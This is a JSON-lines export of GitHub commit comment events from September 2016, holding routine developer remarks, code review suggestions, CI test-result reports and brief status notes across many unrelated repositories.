{"id":"4531432858","type":"CommitCommentEvent","actor":{"login":"GreenAsJade"},"repo":{"name":"ryantheleach/GameOfFactions"},"payload":{"comment":{"id":18938851,"position":null,"line":null,"path":null,"commit_id":"327acd87b8b6f40e5e78e060de0d8bde4d955175","created_at":"2016-09-08T02:23:44Z","updated_at":"2016-09-08T02:23:44Z","body":"Lol - ironically, this commit comment may have secured you a job interview.  Funny how it works..."}},"created_at":"2016-09-08T02:23:44Z"}
{"id":"4531435049","type":"CommitCommentEvent","actor":{"login":"Seeebastian"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18938855,"position":null,"line":null,"path":null,"commit_id":"aad39f92d73fd446f88ad2db81678a5eba5d2aed","created_at":"2016-09-08T02:24:32Z","updated_at":"2016-09-08T02:24:32Z","body":"Did #44"}},"created_at":"2016-09-08T02:24:32Z"}
{"id":"4531436270","type":"CommitCommentEvent","actor":{"login":"flyjwayur"},"repo":{"name":"gr2m/riot-router-example"},"payload":{"comment":{"id":18938858,"position":7,"line":18,"path":"index.html","commit_id":"2abace5d8b8b0a2de570a612eb5b4e03c37a6a4d","created_at":"2016-09-08T02:25:01Z","updated_at":"2016-09-08T02:25:01Z","body":"@gr2m Wow! It works with 'https://gr2m.github.io/riot-router-example/#' like a magic ;D"}},"created_at":"2016-09-08T02:25:01Z"}
{"id":"4531436886","type":"CommitCommentEvent","actor":{"login":"hobart666"},"repo":{"name":"A3Wasteland/ArmA3_Wasteland.Tanoa"},"payload":{"comment":{"id":18938861,"position":null,"line":null,"path":null,"commit_id":"4fe815d454dc753b013d6928dfe18b5549f8d065","created_at":"2016-09-08T02:25:14Z","updated_at":"2016-09-08T02:25:14Z","body":"Hey rev will the rest of this work for the connection issues If I omit the parking addon part? (i'm not using that)"}},"created_at":"2016-09-08T02:25:14Z"}
{"id":"4531437428","type":"CommitCommentEvent","actor":{"login":"revolucas"},"repo":{"name":"OpenXRay/xray-16"},"payload":{"comment":{"id":18938862,"position":null,"line":null,"path":null,"commit_id":"fe7bc5f0d6aa340556769cc116783f02765448b3","created_at":"2016-09-08T02:25:27Z","updated_at":"2016-09-08T02:25:27Z","body":"Strangely, when using this specific commit to _EngineAPI.cpp_ the loading times are considerably longer (After a fresh application startup). I can be confirm by using **-perfhud_hack** to skip this step. With -perfhud_hack or with FreeLibrary restored the loading times are back to normal (After a fresh application startup)."}},"created_at":"2016-09-08T02:25:27Z"}
{"id":"4531437634","type":"CommitCommentEvent","actor":{"login":"Seeebastian"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18938863,"position":null,"line":null,"path":null,"commit_id":"aad39f92d73fd446f88ad2db81678a5eba5d2aed","created_at":"2016-09-08T02:25:31Z","updated_at":"2016-09-08T02:25:31Z","body":"Did #41"}},"created_at":"2016-09-08T02:25:31Z"}
{"id":"4531440480","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"nikomatsakis/rayon"},"payload":{"comment":{"id":18938865,"position":114,"line":114,"path":"src/par_iter/option.rs","commit_id":"fbc8b470a6e06d656428c6f79a11327439ffa59c","created_at":"2016-09-08T02:26:34Z","updated_at":"2016-09-08T02:26:34Z","body":"Huh. I suspect this method is never called. "}},"created_at":"2016-09-08T02:26:34Z"}
{"id":"4531443121","type":"CommitCommentEvent","actor":{"login":"DailyShana"},"repo":{"name":"Fluorohydride/ygopro"},"payload":{"comment":{"id":18938868,"position":null,"line":null,"path":null,"commit_id":"3e0740b77c33cb0b4ec67e078f3532a21690771c","created_at":"2016-09-08T02:27:35Z","updated_at":"2016-09-08T02:27:35Z","body":"由于获取控制权的效果都是“直到结束阶段”而不是“直到回合结束”，因此获取控制权的玩家在结束阶段归还控制权和发动效果的顺序可以任意决定\r\n例如在对方召唤月读命的回合夺取月读命的控制权，结束阶段时，可以选择先归还控制权还是先发动月读命的效果\r\n"}},"created_at":"2016-09-08T02:27:35Z"}
{"id":"4531445082","type":"CommitCommentEvent","actor":{"login":"shogo-mitomo"},"repo":{"name":"shimojun/oxgamejunRep"},"payload":{"comment":{"id":18938869,"position":7,"line":7,"path":"main.rb","commit_id":"0708a9c1856f14c65941e25cb0d8f4f7dc8da801","created_at":"2016-09-08T02:28:16Z","updated_at":"2016-09-08T02:28:16Z","body":"@shimojun `['o', 'x'].sample` で同じことが出来ます👍"}},"created_at":"2016-09-08T02:28:16Z"}
{"id":"4531450515","type":"CommitCommentEvent","actor":{"login":"russelltg"},"repo":{"name":"gentlemans/gentlemanly_engine"},"payload":{"comment":{"id":18938877,"position":null,"line":null,"path":null,"commit_id":"745fde2985d6fc2f53085a2b39de6dca10b4d2bf","created_at":"2016-09-08T02:30:14Z","updated_at":"2016-09-08T02:30:14Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;YKHifYE3&#x2F;46-good-example\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Good example</a>"}},"created_at":"2016-09-08T02:30:14Z"}
{"id":"4531451229","type":"CommitCommentEvent","actor":{"login":"bcotm"},"repo":{"name":"bcotm/Leetcode429"},"payload":{"comment":{"id":18938880,"position":null,"line":null,"path":null,"commit_id":"205555611db8243fad2b74bf0c84b6cf53df11e0","created_at":"2016-09-08T02:30:26Z","updated_at":"2016-09-08T02:30:26Z","body":"wahaha"}},"created_at":"2016-09-08T02:30:26Z"}
{"id":"4531452585","type":"CommitCommentEvent","actor":{"login":"Seeebastian"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18938882,"position":null,"line":null,"path":null,"commit_id":"2c379d03bb9c28f7e26a5fc984c5857b29bc09b1","created_at":"2016-09-08T02:30:55Z","updated_at":"2016-09-08T02:30:55Z","body":"Did #45"}},"created_at":"2016-09-08T02:30:55Z"}
{"id":"4531452862","type":"CommitCommentEvent","actor":{"login":"Seeebastian"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18938883,"position":null,"line":null,"path":null,"commit_id":"3460050d0cb565f700532578f58aa0a1b506e94e","created_at":"2016-09-08T02:31:01Z","updated_at":"2016-09-08T02:31:01Z","body":"Did #45"}},"created_at":"2016-09-08T02:31:01Z"}
{"id":"4531453193","type":"CommitCommentEvent","actor":{"login":"Seeebastian"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18938885,"position":null,"line":null,"path":null,"commit_id":"4d2a6e1493e34b6b64402fb1b337094765e61a9d","created_at":"2016-09-08T02:31:09Z","updated_at":"2016-09-08T02:31:09Z","body":"Did #45"}},"created_at":"2016-09-08T02:31:09Z"}
{"id":"4531454666","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18938887,"position":null,"line":null,"path":null,"commit_id":"94f7a1033dc591525ca6e85a2fb02b11d4d12323","created_at":"2016-09-08T02:31:39Z","updated_at":"2016-09-08T02:31:39Z","body":"128792325-Issue5803 (wfbuhl) - i386-Windows-7-VisualStudio-12: OK (2313 of 2330 tests passed, 555 test warnings)\n\n * 568 tests had: AUD diffs.\n * 164 tests had: EIO diffs.\n * 87 tests had: ERR diffs.\n * 11 tests had: ESO big diffs.\n * 11 tests had: MTR big diffs.\n * 13 tests had: Table big diffs.\n * 24 tests had: RDD diffs.\n * 13 tests had: ESO small diffs.\n * 11 tests had: MTR small diffs.\n * 1 test had: MTD diffs.\n * 2 tests had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-94f7a1033dc591525ca6e85a2fb02b11d4d12323-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-94f7a1033dc591525ca6e85a2fb02b11d4d12323-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.27%25-yellow.svg)</a> \n"}},"created_at":"2016-09-08T02:31:39Z"}
{"id":"4531455169","type":"CommitCommentEvent","actor":{"login":"avberrio"},"repo":{"name":"mat35770/WaitAndGo"},"payload":{"comment":{"id":18938890,"position":null,"line":null,"path":null,"commit_id":"2cadfa6b62bd44c8e13a9ad83c10f650d9611f74","created_at":"2016-09-08T02:31:50Z","updated_at":"2016-09-08T02:31:50Z","body":"Sólo me falta agregar el botón de confirmación y retroceso. Posteriormente, realizar los cambios en la base de datos."}},"created_at":"2016-09-08T02:31:50Z"}
{"id":"4531455694","type":"CommitCommentEvent","actor":{"login":"shogo-mitomo"},"repo":{"name":"shimojun/oxgamejunRep"},"payload":{"comment":{"id":18938891,"position":10,"line":10,"path":"main.rb","commit_id":"0708a9c1856f14c65941e25cb0d8f4f7dc8da801","created_at":"2016-09-08T02:32:02Z","updated_at":"2016-09-08T02:32:02Z","body":"@shimojun \r\n不要な `return` は省略するのがRuby流ですね。\r\nある程度動くようになったら↓を参考にRubyらしい書き方を意識して直していってみてください。\r\nhttps://github.com/fortissimo1997/ruby-style-guide/blob/japanese/README.ja.md"}},"created_at":"2016-09-08T02:32:02Z"}
{"id":"4531456513","type":"CommitCommentEvent","actor":{"login":"ryantheleach"},"repo":{"name":"ryantheleach/GameOfFactions"},"payload":{"comment":{"id":18938892,"position":null,"line":null,"path":null,"commit_id":"327acd87b8b6f40e5e78e060de0d8bde4d955175","created_at":"2016-09-08T02:32:22Z","updated_at":"2016-09-08T02:32:22Z","body":"@GreenAsJade for what it's worth I normally conduct myself better when it comes to serious PR's \r\n\r\nThis repository is really just a collection of the whole server files that I was using for a Minecraft server concept. Whilst I like having configuration in version control having every single plugin in version control is probably a bit much.\r\n\r\nI was getting irritated at the timestamps continually updating and marking the file as dirty, as well as the order of the configuration changing as a library that I was using was storing the config nodes in a hashmap, continually shuffling the file."}},"created_at":"2016-09-08T02:32:22Z"}
{"id":"4531459758","type":"CommitCommentEvent","actor":{"login":"shimojun"},"repo":{"name":"shimojun/oxgamejunRep"},"payload":{"comment":{"id":18938896,"position":null,"line":null,"path":null,"commit_id":"0708a9c1856f14c65941e25cb0d8f4f7dc8da801","created_at":"2016-09-08T02:33:40Z","updated_at":"2016-09-08T02:33:40Z","body":"了解です"}},"created_at":"2016-09-08T02:33:40Z"}
{"id":"4531460883","type":"CommitCommentEvent","actor":{"login":"djayriv"},"repo":{"name":"djayriv/Hello-World"},"payload":{"comment":{"id":18938899,"position":null,"line":null,"path":null,"commit_id":"69595e713562b3d5d31fe7bfb2e0877f2bd6b691","created_at":"2016-09-08T02:34:05Z","updated_at":"2016-09-08T02:34:05Z","body":"First task complete."}},"created_at":"2016-09-08T02:34:05Z"}
{"id":"4531463023","type":"CommitCommentEvent","actor":{"login":"9527001"},"repo":{"name":"CocoaPods/Specs"},"payload":{"comment":{"id":18938900,"position":null,"line":null,"path":null,"commit_id":"9ce309cac066630706a626a9fe5ba9a3cd80c8ea","created_at":"2016-09-08T02:34:51Z","updated_at":"2016-09-08T02:34:51Z","body":"excited\r\n"}},"created_at":"2016-09-08T02:34:51Z"}
{"id":"4531464830","type":"CommitCommentEvent","actor":{"login":"githubsystem"},"repo":{"name":"Dearms/z2121"},"payload":{"comment":{"id":18938903,"position":null,"line":null,"path":null,"commit_id":"d350664b62a311b8611da73a5f9e43d3c6c30e0b","created_at":"2016-09-08T02:35:34Z","updated_at":"2016-09-08T02:35:34Z","body":"Mi5 haven't open source.Why you can made cm14？"}},"created_at":"2016-09-08T02:35:34Z"}
{"id":"4531465714","type":"CommitCommentEvent","actor":{"login":"DU-jdto"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18938905,"position":null,"line":null,"path":null,"commit_id":"57594b3ddb619e61181d0067e4ea7e66211a7e6b","created_at":"2016-09-08T02:35:54Z","updated_at":"2016-09-08T02:35:54Z","body":"@crunchyNYC https://github.com/official-stockfish/Stockfish/commit/ec6aab01366ba1d2de27084d3cc7415a31aa5a24"}},"created_at":"2016-09-08T02:35:54Z"}
{"id":"4531468977","type":"CommitCommentEvent","actor":{"login":"scottpcrawford"},"repo":{"name":"scottpcrawford/Smart-Mirror"},"payload":{"comment":{"id":18938909,"position":null,"line":null,"path":null,"commit_id":"d82d9dfe92cb622d2a1f6ce3aa66050b6fded476","created_at":"2016-09-08T02:37:08Z","updated_at":"2016-09-08T02:37:08Z","body":"location_req_url = 'http://freegeoip.io/json/%s' % self.get_ip() also works at the moment."}},"created_at":"2016-09-08T02:37:08Z"}
{"id":"4531468982","type":"CommitCommentEvent","actor":{"login":"djayriv"},"repo":{"name":"djayriv/Hello-World"},"payload":{"comment":{"id":18938910,"position":null,"line":null,"path":null,"commit_id":"69595e713562b3d5d31fe7bfb2e0877f2bd6b691","created_at":"2016-09-08T02:37:09Z","updated_at":"2016-09-08T02:37:09Z","body":"A problem I would like to solve with programming is the safe removal or destruction of the abandoned landmines scattered around the globe. With the technology we have available to us today I cannot see why that would not be an achievable goal."}},"created_at":"2016-09-08T02:37:09Z"}
{"id":"4531475675","type":"CommitCommentEvent","actor":{"login":"githubsystem"},"repo":{"name":"Dearms/z2121"},"payload":{"comment":{"id":18938926,"position":null,"line":null,"path":null,"commit_id":"d350664b62a311b8611da73a5f9e43d3c6c30e0b","created_at":"2016-09-08T02:39:40Z","updated_at":"2016-09-08T02:39:40Z","body":"Thx. When can you have finished it?"}},"created_at":"2016-09-08T02:39:40Z"}
{"id":"4531476656","type":"CommitCommentEvent","actor":{"login":"jay"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":18938929,"position":null,"line":null,"path":null,"commit_id":"8fa20da8e1a2f38440610221576ff027eb0c7e5e","created_at":"2016-09-08T02:40:03Z","updated_at":"2016-09-08T02:40:03Z","body":"@vszakats Also please review the [push access guidelines](https://github.com/curl/curl/wiki/push-access-guidelines), very much a work in progress. I added a '[Review and discussion](https://github.com/curl/curl/wiki/push-access-guidelines#review-and-discussion)' one just now. Basically it's been a use-your-judgment type thing. Daniel may have a more eloquent (or correct) way of editing it.\r\n\r\nThere is one problem with this commit,\r\n~~~\r\nAuthor: Viktor Szakats <vszakats@users.noreply.github.com>  2016-09-07 04:41:11\r\nCommitter: GitHub <noreply@github.com>  2016-09-07 04:41:11\r\n~~~\r\nshould be\r\n~~~\r\nAuthor: Viktor Szakats <vszakats@users.noreply.github.com>  2016-09-07 04:41:11\r\nCommitter: Viktor Szakats <vszakats@users.noreply.github.com>  2016-09-07 04:41:11\r\n~~~\r\n..because you are the Committer of _anything_ you push. The problem with the former is it doesn't tell us anything about who made the commit (you). I explained this situation to GitHub and it's been added to feature requests as custom merge but I'm not holding my breath.\r\n\r\n\r\n"}},"created_at":"2016-09-08T02:40:03Z"}
{"id":"4531477165","type":"CommitCommentEvent","actor":{"login":"bwangel23"},"repo":{"name":"wklken/k-vim"},"payload":{"comment":{"id":18938930,"position":452,"line":391,"path":"vimrc","commit_id":"eaa5cf53219111314325a2ec9a73d17b820cc3b5","created_at":"2016-09-08T02:40:16Z","updated_at":"2016-09-08T02:40:16Z","body":"@flniu ，懂了，厉害！"}},"created_at":"2016-09-08T02:40:16Z"}
{"id":"4531479026","type":"CommitCommentEvent","actor":{"login":"romeo27091985"},"repo":{"name":"anselmolsm/soletta-machine-learning"},"payload":{"comment":{"id":18938935,"position":4,"line":48,"path":"soletta_module/sml_garden/sml_garden.c","commit_id":"138618b1cf93bcec2f65ca72de9e0aad1aa26be7","created_at":"2016-09-08T02:40:56Z","updated_at":"2016-09-08T02:40:56Z","body":"Success Response\r\n{\r\n\"models\": [\r\n{\r\n\"id\": 144825,\r\n\"quantity\": \"495.1048\",\r\n\"rate\": \"0.0005\",\r\n\"created_at\": 1464168246,\r\n\"lender_id\": 312,\r\n\"borrower_id\": 5712,\r\n\"status\": \"open\",\r\n\"currency\": \"JPY\",\r\n\"fund_reloaned\": true\r\n}\r\n],\r\n\"current_page\": 1,\r\n\"total_pages\": 1"}},"created_at":"2016-09-08T02:40:56Z"}
{"id":"4531480207","type":"CommitCommentEvent","actor":{"login":"kaschioudi"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":18938940,"position":62,"line":147,"path":"MarkupPlugin.inc.php","commit_id":"32783698ba24556f34fbc5aa72f6850ba0ff0948","created_at":"2016-09-08T02:41:24Z","updated_at":"2016-09-08T02:41:24Z","body":"since this is the callback for submissionfiledaodelegate::_updateobject hook, the function gets called everytime there's an update to submission submission_files table. This condition makes sure that jobs are triggered only for production ready documents. Should this be considered a fatal error?"}},"created_at":"2016-09-08T02:41:24Z"}
{"id":"4531480644","type":"CommitCommentEvent","actor":{"login":"romeo27091985"},"repo":{"name":"anselmolsm/soletta-machine-learning"},"payload":{"comment":{"id":18938941,"position":4,"line":48,"path":"soletta_module/sml_garden/sml_garden.c","commit_id":"138618b1cf93bcec2f65ca72de9e0aad1aa26be7","created_at":"2016-09-08T02:41:35Z","updated_at":"2016-09-08T02:41:35Z","body":"![banner_3 money-birds](https://cloud.githubusercontent.com/assets/18251093/18335272/e5258cd4-7586-11e6-9bbf-5d42730db717.jpg)\r\n"}},"created_at":"2016-09-08T02:41:35Z"}
{"id":"4531480917","type":"CommitCommentEvent","actor":{"login":"Ivnmza"},"repo":{"name":"Ivnmza/MantaInteractive"},"payload":{"comment":{"id":18938943,"position":77,"line":84,"path":"index.js","commit_id":"05ec89ee6367c3784ddf4cf7c2f271b80060c952","created_at":"2016-09-08T02:41:41Z","updated_at":"2016-09-08T02:41:41Z","body":"Setting the text to the Manta font is done at the init function as a workaround to load the font before the page loads"}},"created_at":"2016-09-08T02:41:41Z"}
{"id":"4531481747","type":"CommitCommentEvent","actor":{"login":"ccshan"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18938945,"position":null,"line":null,"path":null,"commit_id":"813de8e15cd48f37f068ebc873789cf8634fb822","created_at":"2016-09-08T02:42:02Z","updated_at":"2016-09-08T02:42:02Z","body":"On 2016-09-07T19:12:55-0700, Jacques Carette wrote:\n> Are there calls that fail this?  That seems like a mistake?\n\nSure -- here are some examples from NewSLO:\n\nLine 102 calls `simplify_assuming` to simplify any Hakaru program that's not a measure.\n\nLines 466 and 587 call `simplify_assuming` to simplify the parameters (not weight) of a recognized distribution.\n\nLine 809 calls `simplify_assuming` to simplify an `applyintegrand`, in particular the argument passed to an unknown integrand.\n\n> `simplify_assuming` was previously not called on things that contained 'h'.  That seemed like a good idea.\n\nYes.\n\n-- \nEdit this signature at http://conway.bostoncoop.net/~ccshan/cgi-bin/sig\nGlobal Greens: https://www.globalgreens.org/\n\nGlobal Greens and European Greens Congress, Liverpool, 2017:\nhttp://greens2017.org/\n"}},"created_at":"2016-09-08T02:42:02Z"}
{"id":"4531482996","type":"CommitCommentEvent","actor":{"login":"kaschioudi"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":18938948,"position":78,"line":194,"path":"helpers/XMLPSWrapper.inc.php","commit_id":"32783698ba24556f34fbc5aa72f6850ba0ff0948","created_at":"2016-09-08T02:42:32Z","updated_at":"2016-09-08T02:42:32Z","body":"actually the second parameter was being removed."}},"created_at":"2016-09-08T02:42:32Z"}
{"id":"4531484155","type":"CommitCommentEvent","actor":{"login":"romeo27091985"},"repo":{"name":"anselmolsm/soletta-machine-learning"},"payload":{"comment":{"id":18938951,"position":4,"line":48,"path":"soletta_module/sml_garden/sml_garden.c","commit_id":"138618b1cf93bcec2f65ca72de9e0aad1aa26be7","created_at":"2016-09-08T02:43:02Z","updated_at":"2016-09-08T02:43:02Z","body":"[](url)"}},"created_at":"2016-09-08T02:43:02Z"}
{"id":"4531484645","type":"CommitCommentEvent","actor":{"login":"romeo27091985"},"repo":{"name":"anselmolsm/soletta-machine-learning"},"payload":{"comment":{"id":18938953,"position":3,"line":47,"path":"soletta_module/sml_garden/sml_garden.c","commit_id":"138618b1cf93bcec2f65ca72de9e0aad1aa26be7","created_at":"2016-09-08T02:43:14Z","updated_at":"2016-09-08T02:43:14Z","body":"``Success Response\r\n{\r\n\"models\": [\r\n{\r\n\"id\": 144825,\r\n\"quantity\": \"495.1048\",\r\n\"rate\": \"0.0005\",\r\n\"created_at\": 1464168246,\r\n\"lender_id\": 312,\r\n\"borrower_id\": 5712,\r\n\"status\": \"open\",\r\n\"currency\": \"JPY\",\r\n\"fund_reloaned\": true\r\n}\r\n],\r\n\"current_page\": 1,\r\n\"total_pages\": 1"}},"created_at":"2016-09-08T02:43:14Z"}
{"id":"4531485281","type":"CommitCommentEvent","actor":{"login":"jordanh"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":18938956,"position":null,"line":null,"path":null,"commit_id":"7d2a737a49b2a8c11cd947c8b83d62926d484ed5","created_at":"2016-09-08T02:43:30Z","updated_at":"2016-09-08T02:43:30Z","body":"This is a good start. Our telephone conversation makes more sense now. I don't think we'll be able to reuse _exactly_ same container (`TeamProjectCardContainer`) in the meeting context - that TeamMembers subscription on the container doesn't exactly make sense. We'll probably have to write another container component.\r\n\r\nThis branch is a good illustration of what we need to do. I didn't notice the `isProject` prop on `OutcomeCard` for example."}},"created_at":"2016-09-08T02:43:30Z"}
{"id":"4531487914","type":"CommitCommentEvent","actor":{"login":"kozintsev"},"repo":{"name":"kozintsev/ExcelParserForOpenCart"},"payload":{"comment":{"id":18938962,"position":18,"line":30,"path":"ExcelParserForOpenCart/Prices/GeneralMethods.cs","commit_id":"1ce8e9ef45b07de3bf2da281426410296c2fcb0d","created_at":"2016-09-08T02:44:29Z","updated_at":"2016-09-08T02:44:29Z","body":"bug fix"}},"created_at":"2016-09-08T02:44:29Z"}
{"id":"4531490091","type":"CommitCommentEvent","actor":{"login":"jcoyne"},"repo":{"name":"google/google-api-ruby-client"},"payload":{"comment":{"id":18938966,"position":null,"line":null,"path":null,"commit_id":"fd295849b9409da87db170d60ccd3fed2bcb674c","created_at":"2016-09-08T02:45:18Z","updated_at":"2016-09-08T02:45:18Z","body":"@sqrrrl can you say something about why the version bump was necessary? I was running 0.8.6 on Rails 5 without any noticeable issue."}},"created_at":"2016-09-08T02:45:18Z"}
{"id":"4531490342","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18938967,"position":null,"line":null,"path":null,"commit_id":"94f7a1033dc591525ca6e85a2fb02b11d4d12323","created_at":"2016-09-08T02:45:24Z","updated_at":"2016-09-08T02:45:24Z","body":"128792325-Issue5803 (wfbuhl) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2347 of 2364 tests passed, 556 test warnings)\n\n * 569 tests had: AUD diffs.\n * 164 tests had: EIO diffs.\n * 87 tests had: ERR diffs.\n * 11 tests had: ESO big diffs.\n * 11 tests had: MTR big diffs.\n * 13 tests had: Table big diffs.\n * 24 tests had: RDD diffs.\n * 13 tests had: ESO small diffs.\n * 11 tests had: MTR small diffs.\n * 1 test had: MTD diffs.\n * 2 tests had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-94f7a1033dc591525ca6e85a2fb02b11d4d12323-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-94f7a1033dc591525ca6e85a2fb02b11d4d12323-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.28%25-yellow.svg)</a> \n"}},"created_at":"2016-09-08T02:45:24Z"}
{"id":"4531492061","type":"CommitCommentEvent","actor":{"login":"hepin1989"},"repo":{"name":"akhahaha/graphql-java-promises"},"payload":{"comment":{"id":18938969,"position":103,"line":137,"path":"src/main/java/graphql/execution/ExecutionStrategy.java","commit_id":"c1694be8112c9d6a2731fbfe14241898184bc7fb","created_at":"2016-09-08T02:46:02Z","updated_at":"2016-09-08T02:46:02Z","body":"use `CompletableFuture.allOf`"}},"created_at":"2016-09-08T02:46:02Z"}
{"id":"4531492568","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18938971,"position":null,"line":null,"path":null,"commit_id":"94f7a1033dc591525ca6e85a2fb02b11d4d12323","created_at":"2016-09-08T02:46:13Z","updated_at":"2016-09-08T02:46:13Z","body":"128792325-Issue5803 (wfbuhl) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-94f7a1033dc591525ca6e85a2fb02b11d4d12323-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-08T02:46:13Z"}
{"id":"4531493468","type":"CommitCommentEvent","actor":{"login":"AgentRev"},"repo":{"name":"A3Wasteland/ArmA3_Wasteland.Tanoa"},"payload":{"comment":{"id":18938973,"position":null,"line":null,"path":null,"commit_id":"4fe815d454dc753b013d6928dfe18b5549f8d065","created_at":"2016-09-08T02:46:35Z","updated_at":"2016-09-08T02:46:35Z","body":"What do you mean? Let Git do the merge and everything will be fine."}},"created_at":"2016-09-08T02:46:35Z"}
{"id":"4531500273","type":"CommitCommentEvent","actor":{"login":"WENPIN1"},"repo":{"name":"WENPIN1/Ignite_Java8_Test"},"payload":{"comment":{"id":18938978,"position":22,"line":20,"path":"README.md","commit_id":"220f361fc6224fbea99092d0d1a3e0a8e1791b8c","created_at":"2016-09-08T02:49:12Z","updated_at":"2016-09-08T02:49:12Z","body":"\"-XX:-TieredCompilation\" seems also valid."}},"created_at":"2016-09-08T02:49:12Z"}
{"id":"4531501855","type":"CommitCommentEvent","actor":{"login":"hobart666"},"repo":{"name":"A3Wasteland/ArmA3_Wasteland.Tanoa"},"payload":{"comment":{"id":18938979,"position":null,"line":null,"path":null,"commit_id":"4fe815d454dc753b013d6928dfe18b5549f8d065","created_at":"2016-09-08T02:49:51Z","updated_at":"2016-09-08T02:49:51Z","body":"OK ty."}},"created_at":"2016-09-08T02:49:51Z"}
{"id":"4531502894","type":"CommitCommentEvent","actor":{"login":"WENPIN1"},"repo":{"name":"WENPIN1/Ignite_Java8_Test"},"payload":{"comment":{"id":18938980,"position":null,"line":null,"path":null,"commit_id":"220f361fc6224fbea99092d0d1a3e0a8e1791b8c","created_at":"2016-09-08T02:50:15Z","updated_at":"2016-09-08T02:50:15Z","body":"\"-XX:-TieredCompilation\" seems also valid."}},"created_at":"2016-09-08T02:50:15Z"}
{"id":"4531504322","type":"CommitCommentEvent","actor":{"login":"iwanikhalid"},"repo":{"name":"iwanikhalid/tapak"},"payload":{"comment":{"id":18938983,"position":null,"line":null,"path":null,"commit_id":"7f668c4389bfb0e13e1d207ae8ae02e0e18426f0","created_at":"2016-09-08T02:50:48Z","updated_at":"2016-09-08T02:50:48Z","body":"cc @aienzaini \r\nBro K made a commit in case you wanna update ur dev & live version of the files "}},"created_at":"2016-09-08T02:50:48Z"}
{"id":"4531504671","type":"CommitCommentEvent","actor":{"login":"iwanikhalid"},"repo":{"name":"iwanikhalid/tapak"},"payload":{"comment":{"id":18938984,"position":null,"line":null,"path":null,"commit_id":"40dc117dfc071e6af48cb4cc6fb2fd766b987f1f","created_at":"2016-09-08T02:50:56Z","updated_at":"2016-09-08T02:50:56Z","body":"cc @aienzaini \r\nBro K made a commit in case you wanna update ur dev & live version of the files "}},"created_at":"2016-09-08T02:50:56Z"}
{"id":"4531507255","type":"CommitCommentEvent","actor":{"login":"kaschioudi"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":18938991,"position":null,"line":null,"path":null,"commit_id":"32783698ba24556f34fbc5aa72f6850ba0ff0948","created_at":"2016-09-08T02:51:55Z","updated_at":"2016-09-08T02:51:55Z","body":"clean up done as per Alec's comments."}},"created_at":"2016-09-08T02:51:55Z"}
{"id":"4531508557","type":"CommitCommentEvent","actor":{"login":"tommyrojo"},"repo":{"name":"DeanMaurer/MeanSampleApp"},"payload":{"comment":{"id":18938992,"position":null,"line":null,"path":null,"commit_id":"3f1b1495428b694af8bb7e898978931c3b567c8b","created_at":"2016-09-08T02:52:23Z","updated_at":"2016-09-08T02:52:23Z","body":"NIce work buddy, I'm going to download this and run it! :)"}},"created_at":"2016-09-08T02:52:23Z"}
{"id":"4531509331","type":"CommitCommentEvent","actor":{"login":"13scoobie"},"repo":{"name":"atotech/analyticsAPI"},"payload":{"comment":{"id":18938996,"position":null,"line":null,"path":null,"commit_id":"9cd1d71e7450456b0df25fbdb343301b118c25d6","created_at":"2016-09-08T02:52:40Z","updated_at":"2016-09-08T02:52:40Z","body":"Nice catch! Does decodeURI protect against double quotes and/or double hashtag? I hate that error! "}},"created_at":"2016-09-08T02:52:40Z"}
{"id":"4531509775","type":"CommitCommentEvent","actor":{"login":"seokheelee"},"repo":{"name":"seokheelee/GIT_Mobile"},"payload":{"comment":{"id":18938998,"position":21,"line":274,"path":"Mobile_TC144.java","commit_id":"49bfde291e1d6f2816bbf7d57222aeb6a0d2ff04","created_at":"2016-09-08T02:52:50Z","updated_at":"2016-09-08T02:52:50Z","body":"해당 지연은 필요할까요?\r\n하단과 동일하게 cssSelector 로 변경이 필요할 것 같습니다."}},"created_at":"2016-09-08T02:52:50Z"}
